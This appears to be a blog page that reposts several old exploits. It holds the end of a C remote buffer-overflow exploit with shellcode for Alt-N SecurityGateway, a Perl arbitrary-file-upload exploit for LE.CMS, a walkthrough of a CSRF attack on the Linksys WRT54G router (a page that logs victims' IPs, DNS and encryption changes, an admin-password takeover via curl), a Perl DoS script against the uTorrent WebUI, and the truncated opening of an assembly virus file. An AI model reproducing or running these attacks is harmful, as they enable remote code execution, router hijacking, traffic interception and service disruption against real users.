"\x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e\x5e\x66"
"\x8b\x7e\x22\x97\x3c\x60\x7c\x07\x2c\x20\x66\x93\x88\x5e\x22\x83"
"\xee\xff\xe2\xeb\xe8\xff\xff\xff\xff\x36\x5b\x5b\x93\x91\x83\xe9"
"\xf8\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x71\x7a\x76\x74"
"\x78\x33\x30\x76\x78\x34\x61\x70\x30\x61\x33\x68\x68\x30\x61\x30"
"\x30\x61\x62\x61\x61\x62\x74\x61\x61\x71\x32\x61\x62\x32\x62\x62"
"\x30\x62\x62\x78\x70\x38\x61\x63\x6a\x6a\x69\x6b\x6c\x32\x6a\x6a"
"\x6b\x70\x6d\x6a\x68\x7a\x79\x6b\x6f\x6b\x6f\x6b\x6f\x33\x70\x6c"
"\x6b\x72\x6c\x36\x64\x71\x34\x6c\x6b\x71\x75\x77\x6c\x6c\x6b\x73"
"\x6c\x73\x35\x33\x68\x35\x71\x7a\x6f\x6c\x6b\x70\x6f\x35\x68\x6c"
"\x6b\x71\x6f\x67\x70\x75\x71\x6a\x6b\x77\x39\x6c\x6b\x77\x64\x6c"
"\x6b\x75\x71\x7a\x6e\x76\x71\x69\x70\x6d\x69\x6e\x6c\x6b\x34\x69"
"\x70\x72\x74\x63\x37\x6f\x31\x38\x6a\x74\x6d\x35\x71\x79\x72\x6a"
"\x6b\x6b\x64\x77\x6b\x71\x64\x67\x74\x67\x78\x32\x75\x6d\x35\x6c"
"\x6b\x71\x6f\x77\x74\x35\x71\x6a\x6b\x32\x66\x6c\x6b\x74\x6c\x70"
"\x6b\x6c\x6b\x71\x6f\x35\x6c\x75\x71\x6a\x6b\x75\x73\x66\x6c\x6c"
"\x6b\x6b\x39\x62\x6c\x76\x64\x75\x6c\x33\x71\x6f\x33\x66\x71\x79"
"\x6b\x75\x34\x6c\x6b\x71\x73\x36\x70\x6c\x6b\x71\x70\x74\x6c\x6c"
"\x6b\x72\x70\x75\x6c\x6e\x6d\x6c\x6b\x71\x70\x35\x78\x71\x6e\x73"
"\x78\x6c\x6e\x70\x6e\x64\x6e\x7a\x6c\x30\x70\x6b\x6f\x78\x76\x35"
"\x36\x76\x33\x32\x66\x33\x78\x70\x33\x77\x62\x72\x68\x72\x77\x34"
"\x33\x76\x72\x71\x6f\x70\x74\x6b\x6f\x78\x70\x62\x68\x38\x6b\x6a"
"\x6d\x6b\x6c\x77\x6b\x66\x30\x6b\x6f\x78\x76\x71\x6f\x6b\x39\x6a"
"\x65\x73\x76\x6d\x71\x7a\x6d\x73\x38\x64\x62\x70\x75\x62\x6a\x35"
"\x72\x6b\x6f\x6e\x30\x72\x68\x78\x79\x75\x79\x6b\x65\x6e\x6d\x66"
"\x37\x6b\x6f\x79\x66\x36\x33\x70\x73\x71\x63\x71\x63\x70\x73\x71"
"\x73\x71\x63\x31\x73\x36\x33\x6b\x6f\x68\x70\x32\x66\x65\x38\x71"
"\x37\x74\x6e\x72\x66\x71\x63\x6b\x39\x6b\x71\x6c\x75\x73\x78\x6f"
"\x74\x75\x6a\x74\x30\x6f\x37\x30\x77\x6b\x6f\x79\x66\x32\x6a\x64"
"\x70\x36\x31\x31\x65\x6b\x6f\x6e\x30\x75\x38\x6e\x64\x6e\x6d\x76"
"\x6e\x6b\x79\x71\x67\x6b\x6f\x78\x76\x70\x73\x70\x75\x6b\x6f\x78"
"\x70\x65\x38\x6b\x75\x31\x79\x6c\x66\x70\x69\x30\x77\x6b\x6f\x6e"
"\x36\x70\x70\x31\x64\x71\x64\x76\x35\x6b\x6f\x78\x70\x6c\x73\x72"
"\x68\x6d\x37\x63\x69\x39\x76\x32\x79\x71\x67\x6b\x6f\x6e\x36\x71"
"\x65\x6b\x6f\x78\x70\x73\x76\x73\x7a\x35\x34\x32\x66\x72\x68\x75"
"\x33\x72\x6d\x6d\x79\x6b\x75\x72\x6a\x76\x30\x76\x39\x71\x39\x68"
"\x6c\x6b\x39\x6d\x37\x72\x6a\x30\x64\x6b\x39\x6b\x72\x76\x71\x6f"
"\x30\x7a\x73\x6e\x6a\x6b\x6e\x70\x62\x76\x6d\x6b\x6e\x67\x32\x36"
"\x6c\x6a\x33\x6c\x6d\x33\x6a\x76\x78\x6e\x6b\x6e\x6b\x6e\x6b\x63"
"\x78\x73\x62\x6b\x6e\x6e\x73\x74\x76\x6b\x6f\x62\x75\x70\x64\x6b"
"\x6f\x38\x76\x71\x6b\x76\x37\x76\x32\x30\x71\x30\x71\x70\x71\x72"
"\x6a\x65\x71\x30\x71\x30\x71\x30\x75\x70\x71\x6b\x6f\x78\x70\x75"
"\x38\x6e\x6d\x6e\x39\x74\x65\x78\x6e\x70\x73\x6b\x6f\x6e\x36\x73"
"\x7a\x6b\x6f\x6b\x6f\x36\x77\x6b\x6f\x6e\x30\x6c\x6b\x36\x37\x6b"
"\x6c\x6b\x33\x69\x74\x75\x34\x6b\x6f\x38\x76\x66\x32\x6b\x6f\x38"
"\x70\x33\x78\x7a\x70\x6c\x6a\x63\x34\x71\x6f\x66\x33\x6b\x6f\x6e"
"\x36\x6b\x6f\x68\x70\x61\x61"
},
{NULL, 0, NULL}
};




struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret
{"DOS/Crash/Debug/Test/Fun", 0x61616161 },
{NULL, 0x00000000 }
};

// memory for buffers
unsigned char payloadbuffer[10000], a_buffer[10000];
long dwTimeout=5000;
int timeout=5000;


int main(int argc, char **argv)
{
char c,*remotehost=NULL,temp1[100];
int sh,port=4000,itarget=0;
struct _buf fshellcode, sbuffer;

logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}

WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
// set defaults
sh=0;
// ------------

while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
{
switch (c)
{
case 'h':
if (strchr(optarg,':')==NULL)
{
remotehost=optarg;
}else
{
sscanf(strchr(optarg,':')+1, "%d", &port);
remotehost=optarg;
*(strchr(remotehost,':'))='\0';
}
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'T':
sscanf(optarg, "%ld", &dwTimeout);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}

if(remotehost == NULL)
{
printf(" [-] Please enter remotehost\n");
end_logo();
WSACleanup();
return -1;
}
print_info_banner_line("Host", remotehost);
sprintf(temp1, "%d", port);
print_info_banner_line("Port", temp1);
print_info_banner_line("Payload", shellcodes[sh].name);
sprintf(temp1, "%d", 9998);
print_info_banner_line("BINDPort", temp1);

printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);


memset(payloadbuffer, 0, sizeof(payloadbuffer));
fshellcode.ptr=payloadbuffer;
fshellcode.size=0;

memset(a_buffer, 0, sizeof(a_buffer));
sbuffer.ptr=a_buffer;
sbuffer.size=0;

if(!construct_shellcode(sh, &fshellcode, itarget))
{
end_logo();
WSACleanup();
return -1;
}

printf(" [+] Payload constructed\n");

if(!construct_buffer(&fshellcode, itarget, &sbuffer))
{
printf(" [-] Buffer not constructed\n");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Final buffer constructed\n");


if(!execute(&sbuffer, remotehost, port))
{
printf(" [-] Buffer not sent\n");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sent\n");

end_logo();
WSACleanup();
return 0;
}

int construct_shellcode(int sh, struct _buf * shf, int target)
{
memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
shf->size=shellcodes[sh].length;

return 1;
}



char templ1[] = "POST /SecurityGateway.dll HTTP/1.0\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
"Accept-Language: ru\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"
"Content-Length: %d\r\n\r\n";
char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In";

int encode_uri(char * in, int len, char * out, int *outlen)
{
char *out2=out;
int i;
memset(out,0,*outlen);
for(i=0;i {
*out++='%';
sprintf(out, "%.2x", (unsigned char)in[i]);
out+=2;
}
*outlen=(int)(out-out2);
return 0;
}



int construct_buffer(struct _buf * shf, int target, struct _buf * abuf)
{
unsigned char * cp;
char *lp ;
char buf[10000], buf2[10000],rstr1[10000],rstr2[10000];
int olen;

cp = abuf->ptr;

memset(buf,0,sizeof(buf));
memset(buf2,0,sizeof(buf2));
memset(rstr1,0,sizeof(rstr1));
memset(rstr2,0,sizeof(rstr2));

lp=buf;

// overflow
memset(lp,'\x61',476);
lp+=476;

// jmp over seh
*lp++='\x90';
*lp++='\x90';
*lp++='\xeb';
*lp++='\x04';

// replace SEH
*lp++ = (char)((targets[target].ret ) & 0xff);
*lp++ = (char)((targets[target].ret >> 8) & 0xff);
*lp++ = (char)((targets[target].ret >> 16) & 0xff);
*lp++ = (char)((targets[target].ret >> 24) & 0xff);

memset(lp,'\x90',1500);
lp+=5;

memcpy(lp, shf->ptr, shf->size);
lp+=shf->size;


olen = 1500;
encode_uri(buf, (int)strlen(buf), buf2, &olen);
sprintf(rstr2,templ2,buf2);
sprintf(rstr1,templ1,strlen(rstr2));

strcat((char*)cp,rstr1);
strcat((char*)cp,rstr2);

cp+=strlen((char*)cp);
abuf->size=(int)(cp-abuf->ptr);
return 1;
}


void extract_ip_and_port( char * &remotehost, int * port, char * str)
{
if (strchr(str,':')==NULL)
{
remotehost=str;
}else
{
sscanf(strchr(str,':')+1, "%d", port);
remotehost=str;
*(strchr(remotehost,':'))='\0';
}
}



int hr2_connect(char * remotehost, int port, int timeout)
{
SOCKET s;
struct hostent *host;
struct sockaddr_in addr;
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set x;
int res;

if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}

host = gethostbyname(remotehost);
if (!host) return SOCKET_ERROR;

addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_port = htons(port);
addr.sin_family = AF_INET;

s = socket(AF_INET, SOCK_STREAM, 0);
if (s == SOCKET_ERROR)
{
closesocket(s);
return SOCKET_ERROR;
}

unsigned long l = 1;
ioctlsocket( s, FIONBIO, &l ) ;

connect(s, (struct sockaddr*)&addr, sizeof(addr));

FD_ZERO(&x);
FD_SET(s, &x);

res = select(NULL,NULL,&x,NULL,pstTime);
if(res< 0) return SOCKET_ERROR;
if(res==0) return 0;
return (int)s;
}


int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
return send(s, (char *)buf, len, 0);
}

int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set xy;
int res;

if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}
FD_ZERO(&xy);
FD_SET(s, &xy);

res = select(NULL,&xy,NULL,NULL,pstTime);

if(res==0) return 0;
if(res<0) return -1;

return recv(s, (char *)buf, len, 0);
}

int execute(struct _buf * abuf, char * remotehost, int port)
{
int x;
SOCKET s ;
char RECVB[10000];

s = hr2_connect(remotehost, port, 10000);
if(s==0)
{
printf(" [-] connect() timeout\n");
return 0;
}
if(s==SOCKET_ERROR)
{
printf(" [-] Connection failed\n");
return 0;
}
x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
printf(" [+] Sent %d out of %d bytes\n", x, abuf->size);

x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0);

closesocket(s);
return 1;
}

// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;

optarg = NULL;

if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;

if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}

if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}

next = argv[optind];
next++; // skip past -
optind++;
}

char c = *next++;
char *cp = strchr(optstring, c);

if (cp == NULL || c == ':')
return '?';

cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}

return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------

void print_info_banner_line(const char * key, const char * val)
{
char temp1[100], temp2[100];

memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(val) -1);

memset(temp2,0,sizeof(temp2));
memset(temp2, '\x20' , 8 - strlen(key));
printf(" # %s%s: %s%s# \n", key, temp2, val, temp1);

}



void usage(char * s)
{
int j;
printf("\n");
printf(" Usage: %s -h -t \n", s);
printf(" -------------------------------------------------------------------\n");
printf(" Arguments:\n");
printf(" -h ........ host to attack, default port: 4000\n");
printf(" -t ........ target to use\n");
printf(" -T ........ socket timeout\n");
printf("\n");
printf(" Supported SecurityGateway versions:\n");
for(j=0; targets[j].t!=0;j++)
{
printf(" %d. %s\n",j+1, targets[j].t);
}
printf("\n");
printf(" Code execution:\n");
for(j=0; shellcodes[j].name!=0;j++)
{
printf(" %d. %s\n",j+1, shellcodes[j].name);
}
end_logo();
}

void logo()
{
printf("\n\n");
printf(" ####################################################################### \n");
printf(" # ____ __ _ ______ __ _____ #\n");
printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
printf(" # crew #\n");
printf(" ####################################################################### \n");
printf(" # Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit # \n");
printf(" # Solution: Update to 1.02 version # \n");
printf(" # Author : Heretic2 < heretic2x [at] gmail.com > # \n");
printf(" # Version : 1.0 # \n");
printf(" # System : Windows ALL # \n");
printf(" # Date : 11.06.2008 - 14.06.2008 # \n");
printf(" # ------------------------------------------------------------------- # \n");
}

void end_logo()
{
printf(" # ------------------------------------------------------------------- # \n");
printf(" # Dreatica-FXP crew [Heretic2] # \n");
printf(" ####################################################################### \n\n");
}
Posted by at No comments:

LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit

###################################
# LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit
###################################

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

print <- - - - - - - - - - - - - - - - - - - - - - - - - - - -
- LE.CMS <= 1.4 Remote Arbitrary File Upload Exploit -
- -
- -
- Discovered && Coded By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
- -
- Script Download: http://worldlevel.com -
- milw0rm.com, h4ck-y0u.org, CiperCrew, offsec -
- -
- LE.CMS suffers from a arbitrary file upload vuln.. -
- .. this exploit will upload any file to the server -
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
INTRO

print "\nEnter Target URL(ie: http://site.com): ";
chomp(my $host=);

print "\nEnter Local File Path To Upload(ie: C:\\file.txt): ";
chomp(my $file=);

my $ext = substr $file, rindex $file, '.';
my $fname = int rand 9999;
my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );

my $re = $ua->request(POST $host . '/cms/admin/upload.php',
Content_Type => 'form-data',
Content => [ 'submit0' => 'authed', # if script reads this as TRUE then the script thinks we have already authenticated the username/password, only 0 or undef is false
'submit' => 1,
'password' => 1, # as long as this is true we should be able to upload
'filename' => $fname,
'upload' => [ $file ] ] );

die "Exploit Failed, HTTP Request Failed!" unless $re->is_success;

print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n";
exit;

Posted by at No comments:

#Linksys WRT54G (firmware 1.00.9) Security Bypass

###################################
#Linksys WRT54G (firmware 1.00.9) Security Bypass
###################################

__ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___
| l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \
| ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y
| \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O |
| Y | | | | || || | | | | | || / | __ | | | | || _] | |
| . | j l | | |l || | j l | | || || T j l | | || T l !
l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/

<>< | ><> Hacking the Linksys WRT54G #2
<>< | ><> https://kinqpinz.info/
<>< | ><> by meathive
<>< | ><> root at kinqpinz.info && kinqpinz.info at gmail.com


++| CVE-2008-1247
----------------------
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials
when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via
a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri,
(6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri,
(12) PortRange.tri,(13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri,
(17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri.
NOTE: the Security.tri vector is already covered by CVE-2006-5202.

++| Intro
----------------------
This text is in addition to the findings I have already made public regarding the Linksys WRT54G
wireless router and firewall gateway device. The scripts that process configuration changes do not
require authentication and therefore can be altered _remotely_ via simple form submissions written
in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous
findings and the demo page with sample exploits.

++| Let's Get Dirty
----------------------
You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows
how forms can be constructed in HTML that take advantage of the major flaws present within the
insecure router. In my previous documentation I showed how it is possible to alter configuration
parameters both via Linux command line using curl and HTML form submissions. In this text I
demonstrate how to do these very same things transparently using a combination of HTML form
construction with JavaScript that automagically submits our desired changes.

The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will
redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO
AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all
that is required in order to submit our form that will be constructed using GET parameters observed
from the device's Web interface.

document.f.submit();

This submits forms hidden within the Webpage. Our first example code enables wireless access with an
SSID of our choosing. In this instance, I will use the SSID "kinqpinz".














The reason this works is simple: configuration parameters are constructed in the URL in the Web
interface, hosted by default at the address http://192.168.1.1. One can view these parameters while
configuring their device. The code above simply constructs a URL that is processed by the router's
IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:

http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

It's simple enough to understand what's going on. Each variable passed in the URL describes exactly
what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part
to exploiting the router is the fact that you cannot alter settings using a URL like the one above.
That would result in a GET request on behalf of the device, whereas we're interested in POST
requests that actually trigger configuration changes. A GET request does nothing. Below I describe
a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript,
and a touch of PHP to grab the mark's external IP.

++| Remote Real World Attack Scenario
----------------------
So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It
has made a few assumptions about your environment, however. One major assumption is that you've
kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes
you've made to the router in terms of security, e.g., strong password, wireless encryption, access
restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do
NOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so
that you do not fall victim to a malicious individual hosting code that will be presented in this
text.

++| Remote Real World Attack Scenario Requirements
----------------------
On http://www.hacker.tld a page is hosted that contains the following:
(1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely;
(2) JavaScript that submits these forms transparently;
(3) PHP or similar server-side code that acquires the mark's external IP address as they browse
the page; and,
(4) PHP or similar server-side code that retains the mark's external IP address in the event that
the remote form submission is successful, thus allowing the remote attacker to further exploit the
device.

http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP
is used - though any server-side language is suitable - for obtaining the external IP of any
individual viewing the exploit page and writes this information to a log file.
$ip=$_SERVER['REMOTE_ADDR'];
$toWrite="Potential mark resides at $ip\n\n";
$f=fopen("mark.txt", "a+");
fwrite($f, $toWrite);
fclose($f);
?>

The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute
and submitting the form.



All hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the
HTML form's 'hidden' attribute.














What you should observe from this is the form name of "f" which is used in the JS to submit the form
as well as the various 'name' and 'value' attributes that are used to create a URL such as this:

submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

Do note that without any one of these parameters, the exploit fails and nothing changes. All of the
elements must remain in place even if they do not directly make sense. They are simply options that
the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case
matters and do not forget that the request must be POST, not GET. Also different config changes
require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log.

Now that the malicious page has been composed and sits online living and waiting for marks at
http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom
PHP logging script. In mark.txt, our logging file, sample output would resemble something like the
following.

Potential mark resides at 1.1.1.1

Potential mark resides at 2.2.2.2

Potential mark resides at 3.3.3.3

So forth...

They are potential marks because it is unknown whether or not they are using the WRT54G with a
supported firmware version that is exploitable using these techniques, and/or the exploit attempt
failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not
using the default local address (good for them) that this attack relies on.

When they browse the page, because we have set no timeout for this change to occur, they are
instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request,
does not inform the user if they were educated enough of what has just happened, so they may
continue on doing whatever they were doing, more often than not unaware of what has just happened.
At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at
our leisure and further test the remote host whether or not they are vulnerable to attack. At the
very least, we may decide to completely reset the router to rest assured we know its current state
to make further compromise a snap, such as altering the device's DNS records for sniffing traffic.
This is quite feasible, here's how.







This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en

Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs
all incoming and outgoing requests before passing them on to the next in line.























































This is indeed convoluted but all of these values must be in place in order to be successful. What
is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our
own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8,
and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while
obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the
following URL that is submitted to http://192.168.1.1/Basic.tri.

http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en

++| An Alternative (with JavaScript)
----------------------
This is the basic exploitation method of the router although the attacker has many alternatives of
submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript.
A few alternative methods would include using a JavaScript onClick function within a standard
looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:

This looks innocent enough.

...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this
standard looking navigation link, e.g.:

var xhr=false;
if(window.XMLHttpRequest) {
xhr=new XMLHttpRequest();
} else if(window.ActiveXObject) {
xhr=new ActiveXObject("Microsoft.XMLHTTP");
}
function xhrRequest() {
if(xhr) {
xhr.open("POST", "http://192.168.1.1/Security.tri", true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.onreadystatechange=function() {
if(xhr.readyState == 4 && xhr.status == 200) {
var success=xhr.responseText;
}
}
xhr.send("SecurityMode=0&layout=en");
}
}

The example above effectively disables all wireless encryption so that if you happen to live close
enough to this poor individual, it is your duty to pwn their wireless by enabling open access for
everybody in the neighborhood! Here's the URL for disabling wireless encryption:

http://192.168.1.1/Security.tri?SecurityMode=0&layout=en

++| An Alternative (without JavaScript)
----------------------
You're still exploitable even if you do not allow scripts from executing, e.g., you use Firefox +
NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent
looking methods of compromising your WRT54G. For example, user registration for a bulletin board or
forum system. The site must acquire a minimal amount of information in order to create the account
so it is in submitting this data that we may submit our own payload, perhaps this time we'd like to
enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the
URL once again:

http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en

Again it is a different script processing the request on behalf of the router's internal operating
system, dmz.tri, but it still does not require authentication prior to changing the settings we wish
to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:







...and add these values to their user registration page with standard username/password/e-mail fields...

Username:

Password:

Confirm Password:




...that can be found on traditional forums these days. The mark submits and exploits his/her own
router although they believe they are at least minimally technically savvy by using a combination of
technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms
we use to store the router configs are hidden, and the normal user registration forms are not, thus
it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has
detected that a potential attack is taking place it is likely too late as the mastermind behind
http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up
targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration
changes within 10 seconds, which is plenty of time for them to open another terminal and change the
administrative login to block our mark from changing their settings, e.g.:

curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri

Here the hacker can now log in as admin with password 'pwn' with complete freedom to _REMOTELY_
monitor the mark's internal and outgoing network traffic. This can allow for capturing passwords
via DNS poisoning on the router, man-in-the-middle attacks by pointing the local address of the
router to a rogue DHCP server and accordingly, rogue network of the attacker's, plus more.

++| Conclusion
----------------------
It is my intention in finalizing this document that the reader understands that the Linksys WRT54G
firmware version 1.00.9 does not care if you inside or outside its local network. Nor does it care
whether or not you have the level of privilege thought to be necessary for manipulating sensitive
objects.

Thanks go to hw2B for suggesting I write all of this garbage out.

++| URLs
----------------------
https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document)
https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008)
https://kinqpinz.info/lib/wrt54g/own2.txt (this document)
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)
Posted by at No comments:

utorrene/bittorrnet dos exploit

###################################
#uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit
###################################

#!/usr/bin/perl
# uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
# according to the following advisory: http://secunia.com/advisories/30605
#
# usage: WebUI-dos.pl
# Exploit written by Exodus.
# http://www.blackhat.org.il

use IO::Socket;
use MIME::Base64;

if(@ARGV < 3)
{ &usage; }

($host,$ref) = split(/\//,$ARGV[0]);

$sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
$buff = "E" x 60000;
$up = encode_base64($ARGV[2]);
chomp($up);

print $sock "GET /gui/common.js HTTP/1.1\r\n".
"Host: $host\r\n".
"Authorization: Basic $up\r\n".
"Range: bytes=$buff\r\n".
"Connection: close\r\n\r\n";

close($sock);

print "[!]Payload sent, WebUI should be down...\n";



sub usage
{
print "usage $0 \n".
"ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
exit;
}
Posted by at No comments:

im star virus

####################################1ST_STAR.ASM###################################;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
